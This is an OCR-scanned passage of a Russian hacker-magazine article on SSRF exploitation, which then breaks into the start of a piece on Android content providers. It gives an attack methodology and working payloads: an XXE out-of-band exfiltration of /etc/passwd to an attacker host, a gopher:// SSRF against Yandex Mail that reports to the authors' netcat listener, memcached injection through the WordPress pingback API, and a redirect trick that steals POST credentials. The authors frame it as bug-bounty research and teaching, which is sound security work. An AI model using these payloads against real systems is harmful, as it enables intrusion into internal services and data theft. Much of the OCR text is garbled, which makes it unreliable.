щие возможность атакующего работать с этим сервисом напрямую. 
Разумеется, подделывая пакеты, мы можем играть в перебор 
авторизационных данных, сессий и проводить МІТМ, но это мы рас- 
сматривать не будем. 

Небольшое лирическое отступление: посмотри внимательно 
на последние две группы уязвимостей, приводящих к 55РР. Разу- 
меется, такие вещи, как доступ к внутренней сети через РРІ и под- 
ключение других баз через 5СІІ_ іпіесііоп, были известны очень 
давно. Думается, что еще задолго до 2008 года и работы «ѴѴеЬ 
рогіаіз, даіеѵѵау Іо іпіогтаііоп» (доо.дІ/2оЫН І. хотя достоверных до- 
казательств этому пока не найдено. Да, 55РР — это не что-то прин- 
ципиально новое! Это эксплуатация старого доброго абуза доверия 
и недостаточных сетевых ограничений. Но это новая эксплуатация, 
где предметом исследований стали методы получения данных, 
поиск новых уязвимостей и эксплуатация протоколов сервисов. 
Появилась зтиддііпд-эксплуатация и многое-многое другое. Наде- 
емся, что после прочтения этого абзаца отпадет желание троллить 
на тему «мы делали это сто лет назад через І_РІ». Что вы делали? 
Читали файлики по НТТР/РТР через дырявые РНР-скрипты? Или 
эксплуатировали тетсасЬесІ/по5СІІ_/2аЬЬіх? 

ОТПРАВИТЕЛИ ПАКЕТОВ — СЕТЕВЫЕ БИБЛИОТЕКИ 

Все уязвимости, обеспечивающие подделку запросов, в конечном 
счете вызывают какие-то сетевые библиотеки. Если же про- 
граммист работает с «голыми» сокетами, например посредством 
использования функций Ізоскореп в РНР, можно считать, что эту 
сетевую библиотеку он реализует самостоятельно. Что надо нам 
знать о сетевых библиотеках для проведения атак? В целом не- 
много (или много, как посмотреть): 




• какой протокол используется дляустановкисоединения:ТСР/ 
ІЮР/ІРС/другие; 

• какие байты могут быть дописаны в пакет нами (например, сІІНІ. 
никогда непередастОхОО); 

• в какое место помещаются наши дописанные данные; 

• какие данные идут до наших и после наших; 

• как сетевая библиотека отправляет пакеты — сразу или же ждет 
послеустановки соединения какого-то приветствия отсервера 
(более подробносм. в предыдущем выпуске журнала). 

Чем лучше мы понимаем ответ на вопросы из этого списка, 
тем выше вероятность успешного проведения атаки. Также часто 
случается, что возникают дополнительные ограничения между 
данными запроса с вектором атаки и самой отправкой подделан- 
ного пакета через сетевую библиотеку. Например, это могут быть 
іприі ѵаіісіаііоп фильтры, приведение типов или еще что-то по стеку 
исполнения. 

ПОЛУЧАТЕЛИ ПАКЕТОВ — ЦЕЛЕВЫЕ СЕРВИСЫ 

В первой части статьи мы уже обсуждали, что главное условие 
успешной эксплуатации — отсутствие авторизации на целевом 
сервисе или же ЬозІ-Ьазесі-авторизация. Эксплуатация через брут- 
форс или же подключение с известными логинами/паролями, полу- 
ченными через чтение файлов (что очень даже возможно в рамках 
одной уязвимости, например ХХЕ), не рассматривается — принци- 
пиально все то же самое. 

Теперь обратимся к тем самым сервисам, которые мы хотим экс- 
плуатировать. То есть рассмотрим получателей наших подделанных 
запросов. Глобально может быть только два подвида этих получате- 
лей, в зависимости от типа протокола сетевого взаимодействия: 

• текстовый протокол (рІаіпАехІ, управляющие символы обычно 
\г\п — переводы каретки и строки, остальные байты чаще всего — 
печатные символы); 

• бинарный протокол (пакетсостоитиззаголовка итела данных, 
какправило, взаголовкевстречаетсядлинатела, пакетнесоста- 
вить без управляющих байт — 0x00-0x11). 

Как ты понимаешь, проще всего эксплуатировать рІаіпДехІ- 
протоколы. По счастливому стечению обстоятельств, именно эти 
протоколы используются в по5СН_, системах мониторинга и прочих 
сервисах в вебе. 

В общем случае, когда мы хотим прощупать возможность экс- 
плуатации какого-то сервиса, необходимо проверить, как он реаги- 
рует на невалидные пакеты. Тут есть два варианта — сервис может 
или закрыть сокет, или нет. Бинарные протоколы, как правило, со- 
кет закрывают, рІаіпДехІ же только выдают ошибку и продолжают 
работать. Можешь поэкспериментировать для понимания с НТТР, 
например. Веб-сервер не закроет сокет при получении белиберды, 
только вернет 400 ВасІ гециезі и продолжит ждать новые пакеты 
в том же сокете. 
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Именно эти особенности и помогают нам атаковать. Имея 
возможность помещать в подделанный пакет СРІ.Р (\г\п) байты, 
мы можем заставить сервис корректно обрабатывать его вне 
зависимости от данных, идущих до наших (префикса) и после 
наших (постфикса). Если у тебя возник справедливый вопрос, 
откуда, собственно, в подделанном пакете могут взяться префикс 
и постфикс, ты на правильном пути! Только сначала советуем еще 
раз перечитать первую часть этой статьи и статью в предыдущем 
номере журнала ;). 

ЧТЕНИЕ ОТВЕТА — ТРЮКИ, АКРОБАТЫ И ЦИРКАЧИ 

Отправить запрос на сервер — это еще полдела. Разумеется, 
в ряде случаев хватает и этого — эксплуатация начинается и за- 
канчивается в один запрос или же можно выполнить ее за ограни- 
ченное количество последовательностей запросов — своеобраз- 
ных реплеев. 

Но если есть возможность читать данные ответа целевого сер- 
виса на наш запрос, это всегда только плюс. Как минимум — про- 
ще проверить наличие уязвимостей и работоспособность вектора 
атаки, да и просто отличная демонстрация. Как максимум — в ряде 
случаев необходимо читать ответ, чтобы продолжить атаку. Возь- 
мите хотя бы типичный пример авторизации, пусть мы и знаем 
логин с паролем, но для установки сессии требуется передать 
серверу хеш от пароля и специального токена, который вам сам же 
сервер и передал запросом выше. 

В реальной жизни чтение ответа, как правило, ограничено 
логикой веб-приложения. Есть и универсальные способы, на- 
пример, когда мы можем в процессе парсинга ХМЬдокумента 
обратиться к двум внешним сущностям по очереди, причем 
в адресе второй из них будет содержаться значение первой. 

Этот метод подробно описан в японском блоге: гі.ЬаІепа.пе.ір / 
Іегасс/20090718#1 24791 8667 . И очень помогает эксплуатировать 
ХХЕ. Вот эксплойт: 

<?хт1 ѵег5Іоп="1.0"?> 

< ! ООСТѴРЕ -Роо [ 

< ! ЕМТІТѴ а 5Ѵ5ТЕМ "НИр://а1‘Ьаскег/а«аск.(ИсІ ,, > 

%а; 

]> 

<Роо>&е1;</-Роо> 

а**аск.сіТ:сІ: 

< ! ЕМТІТѴ % рі 5Ѵ5ТЕМ "біе: ///е*с/ра55мсГ> 

< ! ЕМІТѴ % р2 "< ! ЕМТІТѴ еі 5Ѵ5ТЕМ - 
' б«р : //а«аскег/10еМЕ#%р1; ’ > н > 

%р1; 

%Р2; 

Отметим, что трюк будет работать только в таком виде — файл 
аМаск.сІІсІ должен обязательно быть скачан из внешнего источ- 



П* Сотефеікеі оі Зиррогііпд НПР/0.9 

ІѴчрііг іЬг ітргпѵгпммш тжіс іп ІГГТР/І.ОаікІ ИТТР/1.1. іЬс илмгіголіг 
Ісцагѵ оГ іЬг "<ііітЬ' И ГГР/0.9 ргокк оі Іі\т-і «ж. гѵт іГіі в погшаІЬ Нігі- 
гімі Ггот ѵхч»\ ІЪг яргсіАгаііоп Гог Н ГІ Р/1.0 п рапк ю Мате Гог іЬіѵ 
Ьегате іі ггх|ік-мг<1 іЬаі аІІ Гіішгг II ГІ К гііеіт ап<1 «тгп міррогі іЬг 
огікіпаі. КаІІ-Ьакегі сІгаГі. ЗрггіГкаІЬ. ѵгііоп 5.1 шг 

ІГГТР/ 1.0 сВті» тим . іітіегиаімі ат ѵлЫ троте т іЬг 
Гогпиі «Г ІПТР/0.9 от I ПТР/ 1 .0. 

Іп Іаіег ѵеаітц КРС 2616 аііеліричі и» Ьаскігаек оп іЬ» гіч)иігетеш 
(«ггііоп 19.6: *|| і» ЬелопсІ (Не «орг Ы а рпмогоі \рс-гШгаік>п и» тапгіаіг 
сотрііапге ѵоіЬ рггѵіоия ѵггчога.'». Мн агііпк оп іЬс еаіііег аНѵісс. аІІ 
іпікіет Ьгоигл гопіітіе іо «ирроп іЬе Іедемл рпногоі а* нгІІ. 

То ипсіетапгі «Ьу іЬі» раисгп в Напугегош. гггаІІ іЬаі ІГГТР/0.9 іегѵ 
ег» гсрК «гііЬ ікчішіц Ын іЬг гес|иеяг<1 ПІе. Пите в по іпНісаііоп іЬаі іЬс 
гг«роп<ііпк рап\ агІіыІК иіміегчіапсН ІГГТР аті »т»Ье» ю игле ап ІГТМГ 
<!<н ишгпі. ѴѴііЬ (Нв іп тіті. ІеГ* апаЬ/е иЫп Ьаррет іГ іЬе Ьнлнгг игкЬ 
ап ІГГТР/ 1. 1 гсфігм Ю ап ипмврегііпк ХѴГГР игѵісе тппіпк оп рол 25 
оГ гхамри.гот-. 



Раздел из книги ТЬе ТапдІесІ \ѴеЬ Михала Залевски о НТТР/0.9 доступен бесплатно. 
Рекомендуем! 




Важно не путать терминологию, чтобы общаться с другими специалистами 
и понимать материал в интернете! 

ника, если записать все его содержимое в ХМІ_ рауіоасі, ничего 
работать не будет — так уж устроены парсеры. 

Но это для ХХЕ, а как же быть, когда работают другие фильтры? 
Например, данные ответа проверяются на принадлежность к фор- 
мату картинки и только в этом случае отдаются в НТТР-ответ? 

В общем случае можно использовать конкатенацию. Многие про- 
токолы поддерживают отправку более чем одного пакета в рамках 
одного соединения (в одном открытом сокете). Соответственно, 
ответом на такой запрос будет последовательность из ответов 
на каждый пакет запроса по очереди. Для НТТР это называется 
кеер-аііѵе, знакомо, правда? :) Для других рІаіпДехІ-протоколов 
правило множества пакетов в одном сокете также работает почти 
всегда. 

Теперь давай экспериментировать. Пусть надо вытащить 
данные с НТТР-страницы, расположенной на сервере внутри сети, 
через 55РР. При этом уязвимое приложение возвращает строго 
определенный тег ХМІ_. То есть нам надо получить от внутреннего 
веб-сервера абсолютно валидный ХМ1_, где в теге еггог распо- 
лагаются интересные данные. Этот вектор уже был рассмотрен 
в предыдущей статье и на конкурсе 2егоІМідМ5 Ьаскциезі. Поэтому 
приведу один лишь эксплойт, наглядно демонстрирующий конкате- 
нацию с целью подделки формата ответа: 

НТТР/1.1 200 ОК 

Ра*е: ТНи, 08 Иоѵ 2012 14:03:34 СМТ 
Бегѵег: АрасЬе/2.2.16 (йеЫап) 

Х-РомегесІ-Ву : РНР/5 . 3 . 3-7+5циееге14 
Соп1:еп1:-1еп§1:И: 47 
Соп-Сепі-Туре: *ех1:/Іі*т1 

<еггог>< ! [СРАТА[ 

НТТР/1.1 200 ОК 

НТТР/1.1 200 ОК 

]]></еггог> 

Три запроса в одном сокете — и три ответа: хидер, тело и футер 
под наш формат. 

МЕТОДИКА АТАК 

С помощью 55РР можно не только подделывать запросы, но и ви- 
доизменять части запроса, создаваемого логикой уязвимого при- 
ложения. Казалось бы, зачем такое может пригодиться? Для того, 
чтобы утащить данные из исходного запроса! Например, логин/ 
пароли или ключи ОАіЛІі. Это особенно часто встречается в раз- 
личных АРІ. Более подробно про такой вид атак написано ниже. 
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55РР: великий и ужасный 



Вернемся к случаю атаки целевого сервиса и попробуем опи- 
сать общую методику. 

• Изучение возможностей сетевой библиотеки, через которую про- 
водится атака: 

о поддерживаемые протоколы, 

о возможность отправки данных сразу после установки соеди- 
нения, 

о дополнительныеограничения. 

• Сканирование портов локального интерфейса (ІоорЬаск 127.0.0.1). 

• Определение внутренней адресации, если есть (192./172./10. итак 
далее). 

• Сканирование хостов внутренней сети. 

• Сканирование портов внутренней сети по доступным хостам. 

• Определение слушающих сервисов по ІР. 

• Определение слушающих сервисов по баннерам (если возможно). 

• Изучение авторизации доступных по портам сервисов. 

• Изучение доступных по авторизации сервисов по протоколам. 

• Выборсервисов, на которые возможно проведениеатаки, по со- 
ответствию между возможностями сетевой библиотеки, через 
которую проводится атака, и сетевым протоколом самого сервиса. 

Первым делом надо понять, что именно создает нам подделы- 
ваемые пакеты и какие ограничения на это налагаются, — изучить 
сетевую библиотеку. Проще всего для этих целей запустить на сво- 
ем сервере утилиту пеісаі (команда пс —I — ѵѵ — р <Р0РТ>) и смотреть, 
какие данные прилетят нам от уязвимого сервера в том или ином 
случае. Очень хороший и надежный вариант, но требует, очевидно, 
чтобы файрвол на стороне сервера не закрывал возможность со- 
единяться с твоим хостом. Заметим, что сетевая библиотека также 
может сообщать свое название и версию в различных заголовках, 
например внутри «ІІзег-адепІ». Так что обращай внимание на дан- 
ные, которые пришли в пакете. 

Если же соединение принципиально не хочет устанавливать- 
ся, придется действовать вслепую. Для выявления самого факта 
наличия уязвимости в таком случае помогут тайминги — проверка 
времени выполнения запроса с вектором атаки, направленным 
на различные порты, например ІоорЬаск интерфейса. Понятно, 
что файрвол такие соединения блокировать не будет. 

Дополнительными ограничениями могут быть всякие гадкие 
іприі ѵаіісіаііоп фильтры на пути между вектором атаки и сетевой 
библиотекой, подделывающей запрос. Вещи неприятные, но не- 
критичные. Что и логично — такая фильтрация предусмотрена 
обычно совсем не для защиты от ЕБРР, поэтому и помешать она та- 
ким атакам особо не сможет. 

Итак, есть понимание, какие именно запросы и как мы можем 
подделывать. Теперь надо придумать, куда такие запросы можно 
отправлять. По сканированию здесь ничего нового. Обычная 
процедура ознакомления с инфраструктурой. Главным образом 
стоит обратить внимание на локальный интерфейс. В реальной 
жизни на этом можно начать и закончить. Большинство сервисов, 
поддерживающих Ьозі-Ьазесі аіЛЬ, доверяют какому-то опреде- 
ленному хосту и себе самому. В этом случае эксплуатация ЕБРР 
становится просто идеальной — не приходится сканировать хосты 
внутри сети, весь профит можно получить с одного локального 
интерфейса. А двигаться вовнутрь уже после, получив полноцен- 
ный шелл. 

Обрати внимание на возможность получения баннеров сервисов 
в некоторых случаях. Действительно, если есть возможность чи- 
тать ответ сервиса, можно прочитать данные из первого же ответа, 
которые называются баннером. Если здесь что-то ново и непонят- 
но, проще всего выполнить у себя локально такую команду: 

$ ТеІпеТ ІосаІИозТ 22 
Тгуіп§ 

СоппесТесІ "Со ІосаІНоБІ: (::1). 

Езсаре сЬагасТег іб ' а ]'. 

55Н-2 . 0-Ореп55Н_5 . 9 



Если запущен ОрепББН-демон, мы увидим в терминале его бан- 
нер-приглашение, по которому можно понять тип сервиса, а иногда 
и версию. Разумеется, администратор может изменить эту строку. 
Сам метод получения баннеров уже сто лет назад описан в сетевых 
атаках и реализован во множестве сканеров, включая популярный 
ІМплар. 

В реальной жизни же все еще проще — типы сервисов опре- 
деляются по портам, которые, как правило, используются всегда 
стандартные. Список портов можно найти на странице ѴѴікі: 
еп.ѵѵікіресІіа.огд/ѵѵікі/и5І о( ТСР апб 1)РР рогі питЬегБ . Для бо- 
лее редких сервисов проще использовать боодіе. 

Сервисы определили, осталось совсем чуть-чуть. На самом 
деле это по тексту долго читать, но стоит только набить руку, и ата- 
ки пойдут гораздо быстрее :). Лезем в боодіе, читаем про каждый 
сервис разделы авторизации. Если Ьозі-Ьазесі, просто прекрасно, 
помечаем красным и начинаем эксплуатацию с них. 

Лучше всего для выработки вектора атаки поставить сервис 
себе локально и отточить все «на кошках». Если же речь идет про 
какие-то популярные вещи, типа того же тетсасЬегі, можно вос- 
пользоваться примерами из 55РР сЬеаІзЬееІ (кнопка сверху на ІаЬ. 
опБес.ги ). Когда возникает понимание, что надо поместить в пакет 
для эксплуатации атаки, пора сверить часы — может ли наша сете- 
вая библиотека сделать такой пакет? Если да, то счастье в руках, 
если нет — пробуем другой сервис или же прикладываем новые 
усилия, чтобы заставить библиотеку сделать то, что требуется. 
Нередко и сервисы могут работать не совсем так или даже совсем 
не так, как написано в документации на их сетевой протокол, так 
что варианты есть всегда. 

АТАКИ С ЦЕЛЬЮ ПОЛУЧЕНИЯ ДАННЫХ 
ИСХОДНОГО ЗАПРОСА 

Основы эксплуатации целевых сервисов мы обсудили. Теперь мож- 
но рассмотреть более редкий, но интересный вариант проведения 
атаки. Мы уже упоминали, что бывают случаи, когда можно не под- 
делать целиком весь запрос от имени сервера, а только изменить 
часть данных в исходном запросе. Это может пригодиться, чтобы 
прочитать остальную часть запроса, которая может содержать 
интересную информацию, например логин/пароль. 

В самом простом случае можно исправить только получателя 
запроса, тогда данные придут в неизмененном виде. Но на практи- 
ке такой вариант нам пока не встречался, зато встречался более 
сложный и интересный случай. Вот код для ознакомления: 

$иг1 = и НТ-1:р://іпТгапе*-Ьо5Т1/ргіѵаТе-Ьапсі1ег?5=*-* 

{$.6ЕТ[ •*•]}" 5 

$сЬ = сиг1_іпіТ($иг1); 

сиг1_5еТорТ:($сІі, СиРЮР^РОИОкЛОСАТІОМ, 1); 
сиг1_5еТор1:($сИ > СиК1_0РТ_Р05Т, 1); 
сиг1_5еТор1:($сЬ, СІЖІ_0РТ_Р05ТРІЕІ_05, н кеу= 5 есге*"); 

$ге5р = сиг1_ехес($сЬ); 

Как видно, мы можем влиять на путь в ІІРІ_ назначения запроса, 
но не можем изменить адрес хоста. Для полного счастья нам надо 
найти ореп-гесіігесі на хосте Іпігапеі-Ьозіі. Но обрати внима- 
ние, интересные данные передаются методом Р05Т. Это значит, 
что простого редиректа здесь не хватит. Не хватит для браузера, 
но не для сетевой библиотеки сІІРІ_. Если посмотреть исходники 
сІІНІ., станет понятно, что Р05Т превращается в 6ЕТ при ре- 
директе, только когда получен статус ответа 301, 302, 303, 304. 

Но при 300, 305, 306, 307, 307 все пересылается без преобразова- 
ния, то есть формируется новый Р05Т на другой хост, указанный 
в НТТР-заголовке І_осаІіоп, но с тем же телом данных, которое 
было в оригинальном запросе. Таким образом, простого ореп- 
гесіігес* на Іпігапеі-Нозіі не хватит, а вот НТТР геэропзе зріікіпд 
вполне хватит. Еще один интересный случай из жизни описал не- 
давно в своем блоге Леша Синцов: а5Іпиоѵ.Ыод5ро1.ги/2013/01/55гТ 
ЫтІ — настоятельно рекомендуем к ознакомлению. 
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ПРИМЕРЫ 



Настало время живых примеров! Для начала рассмотрим, что могли бы получить из своей находки 
авторы ХМІ_ ріпдЬаск уязвимости в ѴѴогсіРгеББ, если бы читали наши работы по 55РР :). 



ЯНДЕКС 55РР 

В конце прошлого года компания «Яндекс» открыла постоянную 
программу вознаграждения за обнаруженные уязвимости. Суммы 
выплат пока невелики по сравнению с западными конкурентами 
(до 1000 долларов за самые ядреные баги), но мы ведь не ради 
денег развлекаемся, правда? :) Подробности доступны на офи- 
циальном сайте: сотрапѵ.ѵапсіех.ги/зесигііѵ . Мы тоже приняли 
участие в этом движении, во многом потому, что Яндекс — пре- 
красная разнородная по технологиям площадка, которая подходит 
для проверки наших новых теорий. Убедившись, что ББРР-атаки 
полностью отвечают условиям и ограничениям по условиям этого 
конкурса, принялись их искать. 

В целом подобных уязвимостей было найдено немало, но все 
они, по понятным причинам, однотипные. В позапрошлом году мы 
уже делали несколько подходов к 55РР в Яндексе, эксплуатируя 
ХХЕ (слайды можно посмотреть здесь: ЬіЫѵ/1 59ддВо ). В этот заход 
хотелось чего-то посвежее, что и было обнаружено после короткого 
времени. Был проэксплуатирован функционал на странице Яндекс. 
Почты, где можно добавлять Р55-потоки в свои ленты. Запустили 
такой эксплойт в адрес таіі.уапсіех.ги: 

Р05Т /ту/ЬапсІ1ег5/ЬапсІ1ег5. д$х?_Ь=сІо-1еп1:а--РеесІ-асІсІ ♦-< 
НТТР/1 . 1 

Нобі: таіі.уапсіех.ги 



_ЬапсІ1ег5=сІо-1епіа-Реес1-асІсІ&_5егѵісе=1еп1:а&-РеесІ_иг1=«-< 
§|орЬег%ЗА%2Р%2Р$5гТ-іе5І:ег.оп5ес. ги%ЗА8000/І5іа1:5&_— 
соппесТіоп_ісІ=87с098ее99-РЬ-Рб8а7е96БЬЗесІеас-Р214&_скеу=— 
ЬѲМСа2ЬЗЬо№ѵѵЬ%2ВСС1ц7хМКРип2%2Во-Р%2Р2ѲТ%2ВмС2В94к8%30&_«-' 
1оса1е=ги&_ііте5іатр=1352485765744&_ргосІис1:=Ки5 

И стали слушать на сервере ззгМезІег.опзес.ги порт 8000 
с помощью пеісаі (команда пс). Удивлению не было предела, когда 
прилетел вот такой пакет: 

# пс -ѵѵ -1 -р 8000 

1І5І:епіп§ оп [апу] 8000 ... 

соппесі іо [55Г-Р-іе5іег.оп5ес.ги] -Ргот - 

■РгопіѲІЬ . -Реесіз . уапсіех . пеі 

[9Б. 108. 215. 23] 37405 

5ІЭІ5 

Адрес ленты мог содержать ссылку по протоколам, отлич- 
ным от НТТР, например борЬег, а в качестве сетевой библиотеки 




отрабатывал І_ѴѴР (ІіЬѵѵѵѵѵѵ Іог регі). Это давало возможность под- 
делывать ТСР-пакеты с хостов ІгопіМеесІз.уапсІех.ги. Функционал 
исполнялся разными однотипными нодами, в зависимости оттого, 
куда балансировщик нагрузки распределил наш запрос с эксплой- 
том, что можно было видеть по имени хоста, который отправлял 
подделанный запрос. 

Затем последовала фаза сканирования локального интерфейса, 
на котором и был обнаружен открытый порт 11211. Чтобы убедить- 
ся, что на порту висит не что-то там, а именно тетсасЬесі, мы 
сделали следующие запросы: 

§орЬег : //ІосаІЬозі : 11211/9ааа 
§орЬег: //ІосаІЬові : 11211/9яиіі 

Первый из них отрабатывал долго и отбивался по тайм- 
ауту, второй же отрабатывал мгновенно. Все говорило в пользу 
тетсасЬесі. Данные из ответа можно было прочитать только 
в том случае, если вернулся валидный Р55/ХМІ_. В этом случае 
содержимое потока просто добавляется на страницу Яндекс. По- 
чты. Но не так-то просто оказалось отформатировать тетсасЬесІ- 
вывод в ХМ(_: дело в том, что при отправке значений ключей 
всегда добавляется системная строка, начинающаяся с «ѴАШЕ», 
например: 

§еі Неііо 
ѴАШЕ Неііо 0 10 
1234567890 
Е№ 

Такая конструкция всегда ломает ХМІ_, и ничего хорошего не полу- 
чается. Раздосадованные, что у нас есть только возможность 
вслепую устанавливать и менять ключи в тетсасЬесі, мы начали 
думать, как вытащить хоть какие-нибудь данные. 

Кроме тетсасЬесі, наверное, самый очевидный вариант — 
дернуть что-нибудь, доступное по НТТР. Но с НТТР через борЬег 
все тоже не очень просто, так как заголовки ответа всегда меша- 
ются и ломают синтаксис. А без борЬег не сделать несколько за- 
просов вместе, чтобы склеить ответы в нужный нам ХМЬформат. 
Но здесь на помощь приходит прекрасная книжка ТЬе ТапдІесІ ѴѴеЬ 
Михала Залевски, которая подробно рассказывает про сііепі- 
5ІсІе-атаки с использованием НТТР/0.9. Это упрощенный протокол, 
при котором сервер возвращает в сокет только тело ответа без за- 
головков! 

Просто прекрасно, это именно то, что нам и надо. Кстати, этот 
же вектор обнаружен и очень хорошо описан командой РОоІ.Огд 
при выполнении заданий одного из недавних СТР: ЬіІ.Іѵ/ѴБитЗе . 

СЕТ / 

<Ьіт1> 

<ЬеасІ> 



Для демонстрации чтения данных мы выполнили чтение тесто- 
вого файла, доступного по НТТР, на чем и успокоились в этот раз. 

В свое оправданием скажем, что были и другие, более интересные 
и успешные атаки на Яндекс через 55ВР, о которых пока расска- 
зывать не стоит. 
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55РР: великий и ужасный 



ѴѴ0В0РКЕ55 РШОВАСК АРІ 55КР 

Сама уязвимость обнаружена в конце того года и была представ- 
лена миру как возможность сканирования портов локальной сети, 
сервера, на котором установлен ѴѴоггіРгезз: ѵтѵѵ.еіЫсаІЬаскЗг. 
со.ик/іпіго гіисІіоп-{о-іЬе-\люгсірге55-хтІ-грс-арі . Не очень густо, 
правда? А чтобы добавить густоты, надо было смотреть в исходни- 
ки. Для начала вот этот кусочек кода, который содержит ограни- 
чения на формат данных. Именно этот код не дает нам читать все 
содержимое ответа: 

,/мр-іпс1исІе5/с1а55-мр-хт1грс-5егѵег.рИр: 

4988 $1іпеа = мр_гето1:е_-Рореп( $раёе1іпкесІ-Ргот ); 

4989 і-р ( !$1іпеа ) 

4999 ргее_таісН( ' | <1:і“1:1е> ( [ Л < ] ^ ? ) </1:і1:1е> | І5 * , - 
$1іпеа, $та*с№Ше); 

5000 $1і11е = $таі:сЬі:і11е[1]; 

5001 і-Р ( етріу( $ТШе ) ) 

геіигп пей ІХК_Еггог(32, (’Ые саппоТ бпсі 

а Ііііе оп ІЬаі раее.')); 

5003 „ 

5004 $1іпеа = 5Тгір_іа8$( $1іпеа, ’<а>' ); «-* 

// эіібі кеер ІИе іа§ ме пеесі 

5005 

5006 $р = ехр1осІе( "\п\п", $1іпеа ); 

5007 

5008 $рге§_іаг§еі = рге§_цио!:е($ра§е1іпкесІ*о, ' ]'); 

5009 -РогеасЬ ( $р аз $рага ) { 

і-р ( $Тгро5($рага, $ра§еНпкес11о) !== -Раізе ) 

// іі ехізіз, ЬиТ із іі а Ііпк? 

рге§_та1:сІі(" |<а[ Л >]+?" .$рге§_іаг§е'Ь.-' 
"[ л >]*>([ л >]+?)</а> | ", $рага, $сопІехг); 

5012 

5013 // І-Р іЬе 1381. ізп'Т: іп а Ііпк сопіехТ, 

// кеер 1оокіп§ 

і.-р ( етр1:у($соп1:ех1) ) 

5015 сопііпие; 

$ехсегрі = рге§_гер1асе^ 

( ' |\</?мрсоп1:ех1\>| ' , ", $рага); 

5020 

5021 // ргеѵепі геаііу 1оп§ Ііпк іехі 

іР ( 5іг1еп($сопіех1:[1]) > 100 ) 

$соп!ех1[1] = зиЬзіг*-- 
($соп!ехі[1], 0, 100) . 

Ну и какой здесь формат? Все, что между <ШІе> и <ДіИе>, попадает 
в поле автора сообщения, все, что между <а Ьге{="правильная ссыл- 
ка'^ и </а>, — в тело сообщения. При этом на первое поле налагается 
ограничение по длине 255 байт (так как это размер колонки в СУБД), 
а на второе — 100 байт (строки кода 5022-5023). Таким образом, мы 
можем читать суммарно 355 байт. Немного, но вполне достаточно. 
Осталось дело за малым — отформатировать ответ сервера таким об- 
разом, чтобы он содержал нужные нам метки <М1е> и <а Ьге{>. 

Рассмотрим атаку на примере тетсасЬесі. Сначала установим 
маркеры формата в ключи 1_з1аг1, 1_епсі, а_5Іагі, а_епсІ. В ріаіп/ 




Іехі-протоколе тетсасЬесі это будет выглядеть так: 

зеі 1_5іаП: 0 3600 7 
<!і1:1е> 

зе! 1_епгі 0 3600 8 
</1і11е> 

зеі а^зіагі 0 3600 33 
<а бгеР=Иіір : //ІосаІЬозі/мр/ ?р=1> 
зеі а_епс! 0 3600 4 
</а> 

// Собираем все вместе для схемы еорНег:// 

еорЬег : //ІосаІИозІ: : 11211/зеі%20і:_5І:аг1:%200%203600%207%0а^ 
<1і1:1е>%0а5еі:%20і_епсІ%200%203600%208%0а< . тіе>%0азе1:%^ 
20а_5іагі:%200%203600%2033%0а<а Нге*=Ь«р : //ІосаІМозі/мр/- 
?р=1>%0азеі а_епсі%200%203600%204%0а</а>%0ациі1: 

Теперь все готово к атаке. Мы установили метки под ин- 
дексами 1_з1агі/епсі и а_зІагІ/еп(1 со временем жизни один час 
(параметр команды зеі 3600 в секундах). Можно читать данные 
из тетсасЬес), например вывести значение команды зіаі следую- 
щим образом: 

§еі 1_з1агі 
зіаіз 
8еі 1_епс1 
бе! а_з1агі 
§еі а_епсІ 

// Собираем все вместе для схемы §орНег:// 

§орНег://1оса1Но5І:11211/§е!%20і_5Іагі%0а5іаі5%0а§е!%«-' 

20і_епсІ%0а§е1:%20а_5І:аг1:%0а§е1:%20а_епсІ%0аяиі1: 

Если возникли вопросы, как работает протокол СорЬег, 
рекомендуем обратиться к первой части статьи. Заметим также, 
что последняя команда ціііі используется, чтобы закрыть сокет 
и не ждать тайм-аута. В этом составном запросе к тетсасЬегі мы 
прочитали нашу метку 1Ше, а между открывающим и закрывающим 
тегами положили вывод команды зіаіз. Аналогичным образом 
можно читать и другие (чужие) ключи в тетсасбес). Также есть 
вектор атаки на локальный файл ассезз_1од, в который мы можем 
инжектить маркеры в своих запросах, а между ними расположатся 
интересные данные, которые будут прочитаны, — чужие запросы 
к этому серверу (см. скриншоты). 



ЗАКЛЮЧЕНИЕ 

Вот и подошла к концу вторая часть нашей 
статьи про 55ВР-атаки. Не уязвимости, не но- 
вые, а очень даже старые и давно привычные 
идеи эксплуатации доверительных настроек 
внутри сети, 55ВР продолжают радовать нас 
всех новыми векторами и появлением в са- 
мых неподходящих и неожиданных местах, 



как в программах с открытыми исходными 
кодами, так и на серверах крупных компаний. 

От себя пообещаем вернуться с новыми 
эксплойтами в следующих выпусках журнала. 
Все свежие варианты эксплуатации 55ВР 
как с точки зрения уязвимостей, так и с точки 
зрения сервисов, подвластных этой атаке, мы 
соберем для выступления на НІТВ в апреле 



этого года и заранее сообщаем — будет очень 
жарко, смотрите слайды и записи! Также 
не забывай периодически просматривать 
обновления в «55ВР ЫЫе. СЬеаІзЬееІ» (кноп- 
ка сверху на ІаЬ.опвес.ги ). туда стекаются 
самые интересные векторы. До новых встреч 
на страницах журнала, спасибо, что дочитали 
до конца! з: 
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СЛАБОЕ 

ЗВЕНО 

КОНТЕНТ-ПРОВАЙДЕРЫ — СЛАБОЕ 
МЕСТО В АЫВКОШ-ПРИЛОЖЕНИЯХ 



- ■ 



В среднем на АпсігоісІ-устройствах доступно более 
ста экспортируемых контент-провайдеров. Они 
поставляются как системными приложениями, 
так и сторонними. Уязвимость в подсистеме 
контент-провайдеров Апсігоісі автомати- 
чески ставит владельца устройства под 
удар. К открытым контент-провайдерам 
можно обращаться, не имея специ- 
ально запрашиваемых привилегий. 

И приложение, которое читает твои 
приватные данные, фактически 
не проявит никаких признаков 
вредоносного кода... 



- ■ • 



взлом 



|,С Агтап<іоН20 Ѳ РІіскг 



Слабое звено 



САМ СЕБЕ ЗЛОБНЫЙ БУРАТИНО 

На страницах журнала уже не раз обсуждались особенности раз- 
работки приложений для платформы АпсігоісІ, поэтому мы не будем 
лишний раз углубляться в уже известные читателю детали. 

Но все-таки я немного расскажу про архитектуру АпсігоісІ и о не- 
которых ее особенностях. 

Важной возможностью для всех операционных систем общего 
назначения всегда были разнообразные методы межпроцесс- 
ного взаимодействия. В относительно молодой ОС АпсігоісІ было 
использовано очень много удобных решений, которые должны 
были облегчить жизнь разработчикам. Одним изтаких решений 
стали контент-провайдеры. Контент-провайдер — это поставщик 
данных. Любое приложение может создать свой контент-провай- 
дер, который после установки приложения будет зарегистриро- 
ван операционной системой (см. врезку «Как задаются свойства 
контент-провайдера»). 

РАЗГРАНИЧЕНИЕ ДОСТУПА 
И КОНТЕНТ-ПРОВАЙДЕРЫ 

Андроид проектировался как достаточно защищенная платформа, 
